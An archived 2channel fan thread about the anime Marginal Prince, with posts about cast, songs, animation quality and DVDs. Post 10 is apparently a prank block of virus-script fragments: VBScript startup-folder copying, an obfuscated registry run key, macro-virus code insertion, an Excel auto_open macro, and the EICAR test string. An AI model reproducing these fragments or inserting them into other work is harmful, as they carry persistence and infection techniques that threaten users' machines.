2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

マージナルプリンス part3

1 :名無しさん@お腹いっぱい。:2007/01/08(月) 09:00:01 ID:bi76Bov/
放送は終了しました(06年10月〜12月)

■公式サイト
ttp://www.mpri.jp/

■前スレ
【今番組】マージナルプリンス TV電話2時間目
http://anime.2ch.net/test/read.cgi/anime/1163429656/
【新番組】マージナルプリンス
http://anime.2ch.net/test/read.cgi/anime/1159119018/
■アンチスレ
マージナルプリンスは糞アニメ
http://anime.2ch.net/test/read.cgi/anime/1160229069/
■関連スレ
乙女@マージナルプリンス〜月桂樹の王子達〜その4
http://game9.2ch.net/test/read.cgi/ggirl/1163100096/

2 :名無しさん@お腹いっぱい。:2007/01/08(月) 09:00:49 ID:bi76Bov/
■キャスト
ジョシュア・グラント:置鮎龍太郎
アルフレッド・ヴィスコンティ:森田成一
アンリ=ユーグ=ド=サン・ジェルマン:野島健児
シルヴァン・クラーク:三宅淳一
小林春也:岡本寛志
染谷俊:染谷俊
スタニスラフ・ニコラエヴィッチ・ソクーロフ:石川英郎
ミハイル・リューリコヴィッチ・ネフスキー:宮田幸季
■スタッフ
監督
稲垣隆行
砂ぼうず:監督/PEACE MAKER
鐵:演出他

脚本:早坂律子

キャラクターデザイン:佐々木敏子

制作:ゴンジーノ(GDH)

■主題歌
離したくはない/FLAME
■エンディング
LOCK UP DAYS/黒田倫弘

3 :名無しさん@お腹いっぱい。:2007/01/08(月) 09:01:39 ID:bi76Bov/
■キャストA
ユウタ:菅沼久義
エンジュ:遊佐浩二(アニメ・オリジナルキャラクター)
アイヴィー:藤原啓治

TVアニメーション マージナルプリンス-月桂樹の王子達-
■アニメ公式サイト
http://www.mpri-a.jp/

【※実況厳禁】
スレあぼーん+懲罰サーバ(スレ運営が困難)送り。

・基本的にsage進行(メール欄に半角でsage)で。

・アンチ(批難意見)はアンチスレへ。
!アンチスレが必要な場合、こことは別に新たに立て下さい。

・ゲームの話題は各々の専門板へ。
!ゲームスレは>>1を参照の事。

【※重要事項】
・理不尽なキャラ叩きやアニメ叩き、それに付随するゲーム叩きは禁止。
荒し、煽りは徹底的に放置。

・次スレは>>980が立てること。立てられない時は代わりを指名。

4 :名無しさん@お腹いっぱい。:2007/01/08(月) 09:08:00 ID:ZNzkchNo
>>1に乙した方がいい?しなくてもいい?

 ◇ふー、びっくりした

うーん、今回は簡単だとぼくは思っていた。
だって、>>1が立ててくれた次スレだものね。これからもずっとつきあっていかなければなら
ないのだ。この質問のこたえなんて考えるまでもない。けれど、最近のアニメ板情勢を、みん
ながどんなふうに感じているのか、それが探りたくてこのテーマにしたのだ。

するとあらら、不思議。寄せられたのは厳しい反>>1・反スレ立てのメールばかりだっ
た。なぜなのかしらん? というわけで、今回は多数を占める「しなくていい」派からいってみよう。

>>1のスレ立てをねぎらうのは『望ましい』ことであって、『なすべき』ことではない」(住所不明・匿名さん)。
>>1とは仲良くしたほうがいいに決まっているが、住人から頭をさげてまで仲良くする必要はない」(海外在住・匿名さん)。
「友情ごっこのような関係ならいらない。>>1とは必要があればスレ立て乙し、なけ
れば距離をおくくらいでちょうどいい」(北海道旭川市・優子さん)。

ふー、びっくりした。でも、反対派の意見はほぼ一点に集中している。
>>1のスレ立ては趣味だから、乙する必要はないというもの。それ、ほんとなのかなあ。

今回のこたえは数字のうえでは「しなくていい」派が圧倒的だったけれど、
応募しなかった多 数のサイレントマジョリティを考慮にいれて決定させてもらいま
す。
〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
>>1には乙したほうがいい。あたりまえの話だよね。


5 :名無しさん@お腹いっぱい。:2007/01/08(月) 09:27:00 ID:JItiYLWT
>>1
乙姉貴

6 :名無しさん@お腹いっぱい。:2007/01/08(月) 09:30:13 ID:t2R8fQ+K
゚д゚)ルッカッ!! (・∀・)>>1乙エッ!!

7 :名無しさん@お腹いっぱい。:2007/01/08(月) 10:07:26 ID:Ip8Csv4J
>>1
おやすみ

8 :名無しさん@お腹いっぱい。:2007/01/08(月) 14:30:40 ID:th+XbPxK
>>1
姉貴、乙!

9 :名無しさん@お腹いっぱい。:2007/01/08(月) 15:41:52 ID:k2SU/61F
>>1
ビーマ乙!!

10 :名無しさん@お腹いっぱい。:2007/01/08(月) 18:24:55 ID:HJtG/K9k
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

11 :名無しさん@お腹いっぱい。:2007/01/09(火) 01:39:27 ID:hpkOhL6T
>>1
お、乙かれ様です。ご、ごめんね、ボクのせいで。

12 :名無しさん@お腹いっぱい。:2007/01/09(火) 06:07:06 ID:NvqmLPWD
>>1
ミュージック、スタートぉっ!

13 :名無しさん@お腹いっぱい。:2007/01/09(火) 10:27:28 ID:rSdD7fqg
>1
さあ、カウンセリングを始めよう…

14 :名無しさん@お腹いっぱい。:2007/01/09(火) 11:00:07 ID:xqtdXzQu
>>1
こーれで今日ーの治療はー終わりぃいいいいい

15 :名無しさん@お腹いっぱい。:2007/01/09(火) 11:04:20 ID:s0xXobeY
>>1
乙共め

16 :名無しさん@お腹いっぱい。:2007/01/09(火) 13:45:33 ID:LVx/khPv
>>1
乙乙!

17 :名無しさん@お腹いっぱい。:2007/01/09(火) 14:02:28 ID:xEmoxTuo
>>1
おまえ、変な乙だな

18 :名無しさん@お腹いっぱい。:2007/01/09(火) 17:15:41 ID:YAuOG23p
>>1
ごめんね…!

19 :名無しさん@お腹いっぱい。:2007/01/09(火) 20:37:17 ID:tN7yyQQj
プリプリ、マジプリに続く正統派男子校アニメはまだか

20 :名無しさん@お腹いっぱい。:2007/01/09(火) 21:54:17 ID:zlG6Cl9y
1話でオレンジにムカついて暫く見なかったのが悔やまれる。
視聴再開は海の回からだった。

21 :名無しさん@お腹いっぱい。:2007/01/09(火) 22:13:52 ID:MwlvDWyt
>>1


>>20
8話の指パッチンを見逃さなくて良かったではないかw

22 :名無しさん@お腹いっぱい。:2007/01/09(火) 22:26:19 ID:Ap/bGC9n
帰省先から戻ってやっと最終回見れたんだが
なんじゃこりゃwwwwwwwwwテラビーマラwwwww
どうでもいいがギターとドラム演奏の作画だけ良かった

23 :名無しさん@お腹いっぱい。:2007/01/09(火) 22:36:29 ID:btNW5v6s
 _ ∩
( ゚∀゚)彡 ビーマ!ビーマ!ビーマ!ビーマ!ビーマラー!!
⊂彡


24 :名無しさん@お腹いっぱい。:2007/01/09(火) 23:24:21 ID:hpkOhL6T
1話だけ見てないのでDVD楽しみだー。ま、それより爆笑副音声が気になるな。

25 :名無しさん@お腹いっぱい。:2007/01/09(火) 23:44:12 ID:/3q6kIMm
このスレでAT−X組は俺だけ?

26 :名無しさん@お腹いっぱい。:2007/01/10(水) 23:29:28 ID:qpyz35lD
姉貴フィギュア発売キボン

27 :名無しさん@お腹いっぱい。:2007/01/11(木) 00:42:55 ID:Pn3eO62U
やっと最終回見れたけどなんか作画が酷かったね

28 :名無しさん@お腹いっぱい。:2007/01/11(木) 10:21:42 ID:dfasQHGn
>>27
マジプリはすべてにおいて作画最悪

29 :名無しさん@お腹いっぱい。:2007/01/11(木) 17:41:20 ID:BF97GFn4
そういや作画ヲタ的にはどうだったのだろうか
(他作品の比較になって申し訳ないが)
素人目にはハルヒ辺り程動くわけでも無く、蟲師序盤辺りの綺麗さでも無く、
かといってヤシガニキャベツMUSASHIってたわけでもなく、
そこそこといった印象だったが

30 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:52:32 ID:B1of8zsf
素人ですが最終回の姉貴と話すジョシュアはいやんだった
あんま安心感はなかったけどキャラがいいかんじな絵はいっぱいあったと思う

31 :名無しさん@お腹いっぱい。:2007/01/11(木) 19:52:21 ID:3Dq5B0gT
俺は作画は気にならなかった。
ミュージカルが気になりすぎてw

32 :名無しさん@お腹いっぱい。:2007/01/12(金) 01:05:05 ID:z8KW61qp
原画見るとユウタがちょっと違うかな?
1番作画崩れてるのがユウタ…orz

33 :名無しさん@お腹いっぱい。:2007/01/12(金) 08:40:59 ID:S6B6PCCN
作画はDVDでは修正されるかな?
あと特典でミュージカル部分のみのDVDキボンヌ

34 :名無しさん@お腹いっぱい。:2007/01/12(金) 09:03:30 ID:pW3M6aGc
愛情があれば作画なんて

35 :名無しさん@お腹いっぱい。:2007/01/12(金) 12:39:07 ID:6hArHnWn
ジョシュアにたっぷり愛情そそいでたけど
最終回の姉貴と電話は無理だった
アゴ!!アゴがおかしい!!
輪郭!!アゴ!!


36 :名無しさん@お腹いっぱい。:2007/01/12(金) 12:57:14 ID:VY/TCDbm
あれはショックで見返したけど眉毛も目も鼻も口もおかしい
誰だよww
姉貴は…ジョシュアのおかんの半分くらいでも麗しくしてもらえんものか

モブで目立つ人ってユウタ?ピンク?違う人?駄目音感あるひとおしえて

37 :名無しさん@お腹いっぱい。:2007/01/13(土) 22:14:58 ID:f1HOcfKc
このアニメってBL?

38 :名無しさん@お腹いっぱい。:2007/01/14(日) 01:56:03 ID:ImkMip+3
劇中歌はゲームで使われるんだよね?
歌詞で「きみ」とか「you」とかあったら
あとびーまらーとか
言われてるのって姉貴になるわけ?

39 :名無しさん@お腹いっぱい。:2007/01/14(日) 17:44:10 ID:kFybFtYD
>>37
全然。たんなる友情モノ

40 :名無しさん@お腹いっぱい。:2007/01/14(日) 20:09:58 ID:7bxc738K
>>38
その通り。基本的に君とかyouとかなってる対象は姉貴。
そうじゃないのもあるけどね。

41 :名無しさん@お腹いっぱい。:2007/01/14(日) 21:33:24 ID:iuaaRw6c
だとすると
エンジュ「すーまないが少し黙っててくーれないかー」
というのは…

42 :名無しさん@お腹いっぱい。:2007/01/14(日) 22:12:27 ID:GpiacLB0
エンジュマジキビシス

43 :名無しさん@お腹いっぱい。:2007/01/15(月) 01:50:27 ID:tCblr1Ra
ルッカ!オゥイエイ!!

44 :名無しさん@お腹いっぱい。:2007/01/15(月) 21:17:35 ID:UOy6TvBh
今期は、マージナルプリンスを受け継ぐアニメはないようだ

45 :名無しさん@お腹いっぱい。:2007/01/15(月) 21:25:40 ID:uRJh1/Ck
前期はキャベツが突き抜けてマジプリ等が支えたネタアニメ界だが、
今期は小粒なようだね
空気好きには良い期なのかもしれないが、
ちょっと物足りないな

46 :名無しさん@お腹いっぱい。:2007/01/15(月) 22:35:16 ID:GpOuUu14
確かに今期はネタアニメがないな。
テラサビシス

47 :名無しさん@お腹いっぱい。:2007/01/15(月) 23:40:44 ID:LWlPYIcs
今期は面白い新作アニメ無く、寂しいから
録画したのを何度か繰り返し見ている

やはり何度見ても傑作だw

48 :名無しさん@お腹いっぱい。:2007/01/16(火) 01:05:46 ID:pbgqJ4va
早く2期やってくれないかなー

49 :名無しさん@お腹いっぱい。:2007/01/17(水) 00:23:45 ID:do1M7MKs
アニメ終わったら冷めると思ってたマジプリ熱が
一向にさがらねぇぇぇぇ。
思わずCD買っちまったよ。

ジョシュアが雨に打たれながら歌ってる・・・。

50 :名無しさん@お腹いっぱい。:2007/01/17(水) 00:27:47 ID:ROJbKLLA
PVやびーまらぶ収録CDもバレンタインに発売ですってよ

51 :名無しさん@お腹いっぱい。:2007/01/17(水) 01:55:56 ID:YJDlov+X
PV?

52 :名無しさん@お腹いっぱい。:2007/01/17(水) 17:43:11 ID:lnexJAYp
歌ってるシーンだけを収録って事?>PV

53 :名無しさん@お腹いっぱい。:2007/01/18(木) 10:19:58 ID:vB/chBkZ
PV=指パッチンの曲

54 :名無しさん@お腹いっぱい。:2007/01/18(木) 11:17:12 ID:Tlv9qzhy
程度の差こそあれどれもPVだった気が

55 :名無しさん@お腹いっぱい。:2007/01/18(木) 19:13:38 ID:H4tgpHb4
過疎ってるかと思いきや、まだまだ熱いなw
雨の日は『あー森の中でジョシュアが半裸で歌ってるんだろーなー』とか考えてしまう後遺症。
濡れた服はバトラーに洗ってもらってるのだろうか・・・
バ『・・・今日もまた雨の中歌ってらしたようですね』
うわwwwジョシュアテラ痛い子wwww

56 :名無しさん@お腹いっぱい。:2007/01/19(金) 08:12:02 ID:hk9HWKau
ユウタきゅんにちゅっちゅしたいよ〜

57 :名無しさん@お腹いっぱい。:2007/01/19(金) 11:56:29 ID:X86UqXNt
DVD発売まであと6日かぁ

58 :名無しさん@お腹いっぱい。:2007/01/19(金) 21:33:23 ID:kjTb9pm5
つべで見逃した12話みようと思ったら見れなかった・・・orz
やっぱりDVDか

59 :名無しさん@お腹いっぱい。:2007/01/21(日) 06:30:19 ID:TvoEpQTy
 _ ∩
( ゚∀゚)彡 ビーマ!ビーマ!ビーマ!ビーマ!ビーマラー!!
⊂彡



60 :名無しさん@お腹いっぱい。:2007/01/21(日) 09:15:39 ID:6HSHpn9d
なんか最終回だけ見返してないなぁ。終わりだと思いたくないからか?

61 :名無しさん@お腹いっぱい。:2007/01/21(日) 12:28:51 ID:+xSd5cI3
作画がやばいからだろ

62 :名無しさん@お腹いっぱい。:2007/01/21(日) 14:45:41 ID:qq/Qj0ho
ビーマビーマ歌ってる時の横顔がグイグイ出てくるとこ
笑いが止まらないよ誰かAA作って

63 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:55:42 ID:H4KHrIYl
≡( ゚∀) ビーマ!

≡( ゚∀) ビーマ!

≡( ゚∀) ビーマ!

≡( ゚∀) ビーマ!

≡( ゚∀) ビーマラー!!

64 :名無しさん@お腹いっぱい。:2007/01/22(月) 19:00:54 ID:Ac/gaWZx
ナイフが刺さってないのに幽体離脱したジョシュアって霊能力者?

65 :名無しさん@お腹いっぱい。:2007/01/22(月) 19:42:22 ID:k0JgsX4n
心臓を叩かれてびっくりしちゃったんだよたぶん

66 :名無しさん@お腹いっぱい。:2007/01/22(月) 21:31:45 ID:/59YlwXV
ジョシュアは将来地獄先生になりますか?

67 :名無しさん@お腹いっぱい。:2007/01/22(月) 21:41:25 ID:gCN7Vm+Q
これかね?
ttp://ja.wikipedia.org/wiki/%E5%BF%83%E5%AE%A4%E7%B4%B0%E5%8B%95

68 :名無しさん@お腹いっぱい。:2007/01/23(火) 20:17:31 ID:njyvRFTS
このスレを見ている人はこんなスレも見ています。(ver 0.20)
乙女@マージナルプリンス〜月桂樹の王子達〜その4 [女向ゲー一般]
【今番組】マージナルプリンス TV電話2時間目 [アニメ]
菅沼久義 [声優個人]
【それなりに】置鮎龍太郎スレ13【スイーツ三昧】 [声優個人]
【金色のコルダ】火原和樹スレ [アニキャラ個別]


16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)